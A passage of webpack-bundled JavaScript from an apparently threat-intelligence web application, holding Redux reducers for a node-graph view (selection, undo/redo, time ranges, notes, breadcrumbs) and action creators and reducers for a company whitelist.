/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_modules_reports_action_types_js__ = __webpack_require__(92);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_modules_app_action_types_js__ = __webpack_require__(134);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_modules_create_action_types__ = __webpack_require__(204);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_15_modules_company_whitelist__ = __webpack_require__(562);
var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();













var debug = __WEBPACK_IMPORTED_MODULE_9_debug___default()('app:modules:constellation:stores'); // eslint-disable-line no-unused-vars










/* The third argument to pipe is to protect against d3 extent function default for
 * empty array which returns undefined: to avoid we return the default state [0, 0] */
var getNodeTimeExtent = Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["pipe"])(__WEBPACK_IMPORTED_MODULE_7_trustar_constellation_graph_utils_js__["getNodeTimes"], __WEBPACK_IMPORTED_MODULE_2_d3_array__["extent"], function (_ref) {
  var _ref2 = _slicedToArray(_ref, 2),
      a = _ref2[0],
      b = _ref2[1];

  return [a || 0, b || 0];
});

/* Stores
 *
 * NOTE: For most merge actions we merge deep because new data can continously
 * come into the cache and be stored on a node. For example, when we save the
 * x,y positions of nodes we don't want those to get wiped away by doing a
 * shallow merge. By doing a deep merge we allow the data stored here to be
 * built up over time.
 * ======================================================================= */

/**
 * We keep track of the ids of the last exploded nodes so that we can do certain
 * things with them but not with any other nodes in the graph. There may be a
 * better way to identify which nodes just exploded into the graph other than
 * setting their ids here.
 */
var explosionIds = function explosionIds() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["p" /* FETCH_EXPLOSION_SUCCESS */]:
      return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])(payload.data.nodes.map(function (x) {
        return x.id;
      }));
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["r" /* FETCH_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["e" /* CLEAR_EXPLOSION */]:
      return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])(); // Reset
    default:
      return state;
  }
};

var rootNodeId = function rootNodeId() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : null;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["r" /* FETCH_SUCCESS */]:
      return payload.id;
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["N" /* SET_ROOT_NODE_ID */]:
      return payload;
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["m" /* FETCH */]:
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["d" /* CLEAR */]:
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["q" /* FETCH_FAILURE */]:
      return null;
    default:
      return state;
  }
};

/**
 * We use this for adding a tooltip to the node that is hovered in the UI. Can
 * be null when no node is hovered. Also, reset to null after exploding a node.
 */
var hoveredNodeId = function hoveredNodeId() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : null;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["L" /* SET_HOVERED_NODE_ID */]:
      return payload;
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["p" /* FETCH_EXPLOSION_SUCCESS */]:
      return null;
    default:
      return state;
  }
};

var updateSetIfNeeded = function updateSetIfNeeded(state, list) {
  if (state.size === list.length && list.every(function (x) {
    return state.has(x);
  })) {
    return state;
  } else {
    return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])(list);
  }
};

/**
 * NOTE: We set the current node immediately after fetch if it is found so that
 * when the user first opens correlation the current report is the selected
 * node.
 * Also, we try the node id and initial id for a match becuase if this is an
 * indicator node then there is no initial id.
 */
var currentNodeIds = function currentNodeIds() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["r" /* FETCH_SUCCESS */]:
      var node = payload.data.nodes.find(function (x) {
        return x.id === payload.id || x.initialId === payload.id;
      }); // See NOTE
      return node ? __WEBPACK_IMPORTED_MODULE_0_immutable__["Set"].of(node.id) : state;
    case __WEBPACK_IMPORTED_MODULE_11_modules_analysis_action_types_js__["i" /* FETCH_ANALYSIS_SUCCESS */]:
      return payload.data.get('nodes').filter(function (node) {
        return node.get('rootNode');
      }).map(function (n) {
        return n.get('id');
      }).toSet();
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["O" /* TOGGLE_NODE */]:
      return state.has(payload) ? state.remove(payload) : state.add(payload);
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["A" /* REPLACE_SELECTION */]:
      return updateSetIfNeeded(state, payload);
    case __WEBPACK_IMPORTED_MODULE_15_modules_company_whitelist__["actionTypes"].SAVE_WHITELIST_ENTRY_SUCCESS:
      return state.filter(function (x) {
        return x === payload.get('guid');
      }).size === 0 ? state : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])();
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["m" /* FETCH */]:
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["h" /* DELETE_NODES_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_12_modules_reports_action_types_js__["v" /* REMOVE */]:
    case __WEBPACK_IMPORTED_MODULE_13_modules_app_action_types_js__["SET_LAST_ROUTE"]:
      return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])();
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["n" /* FETCH_EXPLOSION */]:
      return __WEBPACK_IMPORTED_MODULE_0_immutable__["Set"].of(payload.id);
    default:
      return state;
  }
};

var currentGraphId = function currentGraphId() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : null;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_11_modules_analysis_action_types_js__["i" /* FETCH_ANALYSIS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["r" /* FETCH_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["q" /* FETCH_FAILURE */]:
      return payload.id;
    case __WEBPACK_IMPORTED_MODULE_14_modules_create_action_types__["UPDATE_REPORT_SUCCESS"]: // Constellation will be refetched, delete the current data
    case __WEBPACK_IMPORTED_MODULE_11_modules_analysis_action_types_js__["c" /* DELETE_ANALYSIS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_12_modules_reports_action_types_js__["D" /* REMOVE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_11_modules_analysis_action_types_js__["h" /* FETCH_ANALYSIS_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["d" /* CLEAR */]:
      return null;
    default:
      return state;
  }
};

var options = function options() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_7_trustar_constellation_graph_utils_js__["GraphOptions"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["M" /* SET_OPTIONS */]:
      return state.merge(payload);
    default:
      return state;
  }
};

var fromAnalysis = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils_utils_js__["pick"])('nodes', 'edges');

var isRootNode = function isRootNode(node) {
  return node.get('rootNode', false);
};

/**
 * NOTE: We make an assumption that any graph has a single root node. If it has
 * multiple we should still be fine, since `find` will just take the first one
 * (although there should never be more than one). However, if for some reason
 * we do NOT get a rootNode in the graph this will be innaccurate. The IO should
 * keep anything from breaking, but the data will be off.
 */
var getInitialTimeRange = function getInitialTimeRange(nodes, limit) {
  var rootNodeTime = Object(__WEBPACK_IMPORTED_MODULE_8_trustar_fp__["IO"])(function () {
    return nodes;
  }).map(function (nodes) {
    return nodes.find(isRootNode);
  }) // See NOTE
  .map(__WEBPACK_IMPORTED_MODULE_7_trustar_constellation_graph_utils_js__["getNodeTime"]).fold(function (err) {
    debug('Warning: There was an error getting the rootNodeTime of this graph', err);
    return Date.now(); // Default to now, so it won't affect our comparison
  }, function (time) {
    return time || Date.now();
  });

  var limitedNodes = limit ? nodes.valueSeq().filter(__WEBPACK_IMPORTED_MODULE_7_trustar_constellation_graph_utils_js__["getNodeTime"]) // Only account for nodes with a time
  .sort(function (a, b) {
    return __WEBPACK_IMPORTED_MODULE_4_date_fns_compare_desc___default()(Object(__WEBPACK_IMPORTED_MODULE_7_trustar_constellation_graph_utils_js__["getNodeTime"])(a), Object(__WEBPACK_IMPORTED_MODULE_7_trustar_constellation_graph_utils_js__["getNodeTime"])(b));
  }).take(limit) : nodes.valueSeq().filter(__WEBPACK_IMPORTED_MODULE_7_trustar_constellation_graph_utils_js__["getNodeTime"]);

  var _getNodeTimeExtent = getNodeTimeExtent(limitedNodes),
      _getNodeTimeExtent2 = _slicedToArray(_getNodeTimeExtent, 2),
      min = _getNodeTimeExtent2[0],
      max = _getNodeTimeExtent2[1];

  return [__WEBPACK_IMPORTED_MODULE_5_date_fns_min___default()(min, rootNodeTime).getTime(), // Ensure that the root node
  max];
};

var toAnalysisData = Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["pipe"])(fromAnalysis, function (x) {
  return x.toJS();
}, // Don't remember why we do this. Looks like we use fromAnalysis just to normalize shape and then reconvert to plain object
__WEBPACK_IMPORTED_MODULE_7_trustar_constellation_graph_utils_js__["toGraphData"]);

/* Handle various actions that need to update state history for UNDO/REDO */
var updateGraphHistory = function updateGraphHistory(state) {
  var position = state.getIn(['history', 'index']);
  var timeline = state.getIn(['history', 'timeline']);
  if (position < timeline.size) {
    return state.updateIn(['history', 'index'], function (i) {
      return i + 1;
    }).setIn(['history', 'timeline'], timeline.take(position).push(state.get('currentGraph')));
  } else {
    return state.updateIn(['history', 'index'], function (i) {
      return i + 1;
    }).updateIn(['history', 'timeline'], function (t) {
      return t.push(state.get('currentGraph'));
    });
  }
};

/**
 * The graph reducer updates individual graphs within the larger OrderedMap. It
 * does much of the heavy lifting of maintaining graph state.
 *
 * NOTE: We decided that when a user explodes a node we want to show all the
 * nodes that were returned even if they were previously deleted. So we remove
 * their id from the deleted nodes list.
 */

var graph = function graph() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_7_trustar_constellation_graph_utils_js__["Graph"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {

    // Remove the cached graph state as well as undo history, however, LEAVE
    // INTACT the node positioning cache.
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["u" /* INVALIDATE_GRAPH_CACHE */]:
      return state.remove('currentGraph').remove('history');

    case __WEBPACK_IMPORTED_MODULE_11_modules_analysis_action_types_js__["i" /* FETCH_ANALYSIS_SUCCESS */]:
      {
        var _data = toAnalysisData(payload.data);
        var timeRange = state.getIn(['currentGraph', 'timeRange']);

        // For analysis we default the timeRange to the full extent rather than only
        // showing a subset as we do for normal graphs
        if (Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["equals"])(timeRange, Object(__WEBPACK_IMPORTED_MODULE_7_trustar_constellation_graph_utils_js__["CurrentGraph"])().timeRange)) {
          timeRange = getNodeTimeExtent(_data.nodes);
        }

        return state.setIn(['currentGraph', 'id'], payload.id).setIn(['currentGraph', 'type'], 'analysis').mergeDeepIn(['currentGraph', 'data'], _data).setIn(['currentGraph', 'timeRange'], timeRange); // Set timeRange based on nodes
      }

    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["r" /* FETCH_SUCCESS */]:
      {
        var _data2 = Object(__WEBPACK_IMPORTED_MODULE_7_trustar_constellation_graph_utils_js__["toGraphData"])(payload.data);
        var _timeRange = state.getIn(['currentGraph', 'timeRange']);

        // Default the initial extent to the extent of the most recent 30 nodes
        // This is meant to alleviate really large graphs by only showing a subset
        // initially
        if (Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["equals"])(_timeRange, Object(__WEBPACK_IMPORTED_MODULE_7_trustar_constellation_graph_utils_js__["CurrentGraph"])().timeRange)) {
          _timeRange = getInitialTimeRange(_data2.get('nodes'), 30);
        }

        return state.setIn(['currentGraph', 'id'], payload.id).setIn(['currentGraph', 'viewType'], 'report').setIn(['currentGraph', 'type'], payload.type).setIn(['currentGraph', 'indicatorType'], payload.indicatorType).setIn(['currentGraph', 'value'], payload.value).mergeDeepIn(['currentGraph', 'data'], _data2) // See NOTE
        .setIn(['currentGraph', 'timeRange'], _timeRange) // Set timeRange based on nodes
        .setIn(['currentGraph', 'initialSettledState'], null) // Reset initial settled state
        .setIn(['history', 'index'], 0).setIn(['history', 'timeline'], Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])()).updateIn(['currentGraph', 'filters'], function (f) {
          return f.clear();
        });
      }

    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["K" /* SET_FILTERS_SUCCESS */]:
      return updateGraphHistory(state).mergeIn(['currentGraph', 'filters'], payload.filters);

    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["h" /* DELETE_NODES_SUCCESS */]:
      return updateGraphHistory(state).mergeIn(['currentGraph', 'deletedNodes'], payload.data);

    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["p" /* FETCH_EXPLOSION_SUCCESS */]:
      {
        // We set root node flag to false on all nodes since this is an explosion.
        // The server doesn't know since we issued a standard request, but we need
        // to keep track of the fact that none of these nodes is actually the root
        // of the graph we will be displaying.
        var _data3 = Object(__WEBPACK_IMPORTED_MODULE_7_trustar_constellation_graph_utils_js__["toGraphData"])({
          nodes: payload.data.nodes.map(function (x) {
            x.rootNode = false;
            x.isExplosion = true;
            return x;
          }),
          edges: payload.data.edges
        });

        var merged = state.getIn(['currentGraph', 'data', 'nodes']).merge(_data3.get('nodes'));

        // Compute the maximum time range for every node expansion, otherwise not
        // all the new nodes in the expansion may appear due to the initial time
        // range possibly filtering these nodes out.
        var _timeRange2 = getInitialTimeRange(merged);

        return updateGraphHistory(state).mergeDeepIn(['currentGraph', 'data'], _data3).setIn(['currentGraph', 'timeRange'], _timeRange2); // Set timeRange based on nodes
      }

    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["c" /* CACHE_GRAPH_SIMULATION_SUCCESS */]:
      {
        var meta = Object(__WEBPACK_IMPORTED_MODULE_7_trustar_constellation_graph_utils_js__["GraphMeta"])({
          id: payload.id,
          nodePositions: Object(__WEBPACK_IMPORTED_MODULE_7_trustar_constellation_graph_utils_js__["toNodePositions"])(payload.data),
          initialSettledState: null
        });
        return state.updateIn(['currentGraph', 'initialSettledState'], function (x) {
          return x || state;
        }) // Push initial settled state only once
        .set('meta', meta);
      }

    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["Q" /* UNDO_SUCCESS */]:
      {
        var position = state.getIn(['history', 'index']);
        if (position > 0) {
          var previousState = state.getIn(['history', 'timeline']).get(position - 1);
          /* if we undo at the end of the timeline we need to add the current state to the timeline
             to history so if we redo we can revisit it: */
          if (position === state.getIn(['history', 'timeline']).size) {
            var currentState = state.get('currentGraph');
            return state.updateIn(['history', 'timeline'], function (t) {
              return t.push(currentState);
            }).updateIn(['history', 'index'], function (i) {
              return i - 1;
            }).set('currentGraph', previousState);
          } else {
            return state.updateIn(['history', 'index'], function (i) {
              return i - 1;
            }).set('currentGraph', previousState);
          }
        } else {
          return state;
        }
      }

    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["z" /* REDO_SUCCESS */]:
      {
        var _position = state.getIn(['history', 'index']);
        if (_position < state.getIn(['history', 'timeline']).size - 1) {
          var nextState = state.getIn(['history', 'timeline', _position + 1]);
          return state.set('currentGraph', nextState).updateIn(['history', 'index'], function (i) {
            return i + 1;
          });
        } else {
          return state;
        }
      }

    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["E" /* RESET_SUCCESS */]:
      {
        if (state.getIn(['history', 'timeline']).size === 0) return state; // default if no actions are taken yet
        var initialState = state.getIn(['currentGraph', 'initialSettledState'], state);
        if (!initialState) return state; // safety catch
        return initialState.setIn(['history', 'index'], 0).setIn(['history', 'timeline'], Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])()).updateIn(['currentGraph', 'filters'], function (f) {
          return f.clear();
        });
      }

    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["U" /* UPDATE_TIME_RANGE */]:
      return state.setIn(['currentGraph', 'timeRange'], payload.data);

    default:
      return state;
  }
};

/**
 * NOTE: Currently this does nothing other than delegate updates to the graph
 * function based on the passed id. There's likely a more elegant way to do
 * this since it's not doing much. We could just update state no matter what if
 * there is an id in the payload...
 */
var graphs = function graphs() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_11_modules_analysis_action_types_js__["i" /* FETCH_ANALYSIS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["r" /* FETCH_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["p" /* FETCH_EXPLOSION_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["K" /* SET_FILTERS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["h" /* DELETE_NODES_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["c" /* CACHE_GRAPH_SIMULATION_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["Q" /* UNDO_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["z" /* REDO_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["U" /* UPDATE_TIME_RANGE */]:
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["E" /* RESET_SUCCESS */]:
      return state.update(payload.id, function (x) {
        return graph(x, action);
      });

    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["u" /* INVALIDATE_GRAPH_CACHE */]:
      // Take that cache (╯°□°）╯︵ƎHƆ∀Ɔ
      return state.map(function (x) {
        return graph(x, action);
      }); // Run on all graphs

    case __WEBPACK_IMPORTED_MODULE_14_modules_create_action_types__["UPDATE_REPORT_SUCCESS"]:
      return state.delete(payload); // Constellation will be refetched, delete the current data

    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];
  var type = action.type;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["m" /* FETCH */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["r" /* FETCH_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["q" /* FETCH_FAILURE */]:
      return false;
    default:
      return state;
  }
};

var hasUserSeenTimeRangeExplanation = function hasUserSeenTimeRangeExplanation() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["f" /* CLOSE_TIME_RANGE_EXPLANATION */]:
      return true;
    default:
      return state;
  }
};

var createOrUpdateNoteList = function createOrUpdateNoteList(note) {
  return function (list) {
    var result = list || Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["OrderedMap"])();
    return result.set(note.guid, note);
  };
};

/**
 * A map of node ids to their associated ordered maps of notes
 *
 * NOTE: This could be considered a "thin" store / reducer, because it really
 * doesn't do much. The majority of the data processing has been off-loaded to
 * the epics since there is a lot of data mapping giong on and epics can handle
 * errors cracefully.
 */
var notes = function notes() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["H" /* SAVE_NOTE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["T" /* UPDATE_NOTE_SUCCESS */]:
      return state.update(payload.nodeGuid, createOrUpdateNoteList(payload));
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["x" /* PROCESS_ANNOTATIONS_SUCCESS */]:
      return state.merge(payload);
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["k" /* DELETE_NOTE_SUCCESS */]:
      return state.removeIn([payload.nodeGuid, payload.guid]).filter(function (x) {
        return !x.isEmpty();
      }); // Remove empty maps. I.e. if they have no notes
    default:
      return state;
  }
};

/**
 * NOTE: It's highly likely a user would save a note after deep linking in to
 * see one in which they were tagged. If the active note is NOT reset then after
 * saving a note the note list will still scroll back to the "active" note,
 * which makes no sense. We want to scroll to the bottom, so we reset the active
 * note.
 */
var activeNote = function activeNote() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : null;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["I" /* SET_ACTIVE_NOTE */]:
      return payload;
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["H" /* SAVE_NOTE_SUCCESS */]:
      // See NOTE
      return null;
    default:
      return state;
  }
};

var constellation = Object(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__["combineReducers"])({
  graphs: graphs,
  currentGraphId: currentGraphId,
  rootNodeId: rootNodeId,
  hasUserSeenTimeRangeExplanation: hasUserSeenTimeRangeExplanation,
  notes: notes
});

/**
 * Used to highlight a node on the graph in whichever way you want
 * @param state, a node
 * @param action
 * @returns {<*, *>}
 */
var highlightedNode = function highlightedNode() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["t" /* HIGHLIGHT_NODE */]:
      return payload;
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["D" /* RESET_HIGHLIGHT_NODE */]:
      return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])();
    default:
      return state;
  }
};

var bringToTopOrAddBreadcrumb = function bringToTopOrAddBreadcrumb(state, payload) {
  if (state.has(payload.id)) {
    return state.remove(payload.id).set(payload.id, Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(payload));
  } else {
    return state.set(payload.id, Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(payload));
  }
};
var breadcrumbTrail = function breadcrumbTrail() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["C" /* RESET_BREADCRUMBS */]:
      return state.clear();
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["a" /* ADD_BREADCRUMB */]:
      return bringToTopOrAddBreadcrumb(state, payload);
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["s" /* GO_TO_BREADCRUMB */]:
    default:
      return state;
  }
};
var currentBreadcrumbId = function currentBreadcrumbId() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : '';
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;

  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["C" /* RESET_BREADCRUMBS */]:
      return '';
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["a" /* ADD_BREADCRUMB */]:
      return payload.id;
    case __WEBPACK_IMPORTED_MODULE_10__action_types_js__["s" /* GO_TO_BREADCRUMB */]:
      return payload;
    default:
      return state;
  }
};
/**
 * NOTE: These reducers were initially factored out of the constellation store
 * for performance reasons. Updates to unrelated fields were causing the rather
 * expensive currentGraphData getter to be called A LOT.
 */
var constellationMeta = Object(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__["combineReducers"])({
  explosionIds: explosionIds,
  hoveredNodeId: hoveredNodeId,
  currentNodeIds: currentNodeIds, // The set of currently selected nodes
  options: options,
  loading: loading,
  activeNote: activeNote,
  highlightedNode: highlightedNode,
  breadcrumbTrail: breadcrumbTrail,
  currentBreadcrumbId: currentBreadcrumbId
});

/***/ }),
/* 3193 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchCompanyWhitelist", function() { return fetchCompanyWhitelist; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "saveWhitelistEntry", function() { return saveWhitelistEntry; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "saveWhitelistEntries", function() { return saveWhitelistEntries; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteWhitelistEntry", function() { return deleteWhitelistEntry; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "clearWhitelist", function() { return clearWhitelist; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "updateFilters", function() { return updateFilters; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "resetFilters", function() { return resetFilters; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__action_types_js__ = __webpack_require__(281);




/* Fetches all whitelist entries */
var fetchCompanyWhitelist = function fetchCompanyWhitelist() {
  return { type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["FETCH_WHITELIST_PAGE"] };
};

/* Handles save new entry and edit entry*/
var saveWhitelistEntry = function saveWhitelistEntry(whitelistEntry) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["SAVE_WHITELIST_ENTRY"],
    payload: whitelistEntry
  };
};

var saveWhitelistEntries = function saveWhitelistEntries(texts) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["SAVE_WHITELIST_ENTRIES"],
    payload: texts
  };
};

/* Delete by guid */
var deleteWhitelistEntry = function deleteWhitelistEntry(whitelistEntry) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["DELETE_WHITELIST_ENTRY"],
    payload: whitelistEntry
  };
};

var clearWhitelist = function clearWhitelist() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["CLEAR_WHITELIST"]
  };
};

var updateFilters = function updateFilters(payload, field) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["UPDATE_PAGE_FILTERS"],
    payload: payload,
    field: field
  };
};

var resetFilters = function resetFilters() {
  return { type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["RESET_PAGE_FILTERS"] };
};

/***/ }),
/* 3194 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export entries */
/* unused harmony export modalOpen */
/* unused harmony export loading */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__getters__ = __webpack_require__(758);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(281);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__types__ = __webpack_require__(759);








var entries = function entries() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["FETCH_WHITELIST_PAGE_SUCCESS"]:
      var items = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(payload.get('items')).toOrderedMap().mapKeys(function (k, v) {
        return v.get('guid');
      });
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(payload).set('items', items);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SAVE_WHITELIST_ENTRY_SUCCESS"]:
      return state.setIn(['items', payload.get('guid')], payload);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["DELETE_WHITELIST_ENTRY_SUCCESS"]:
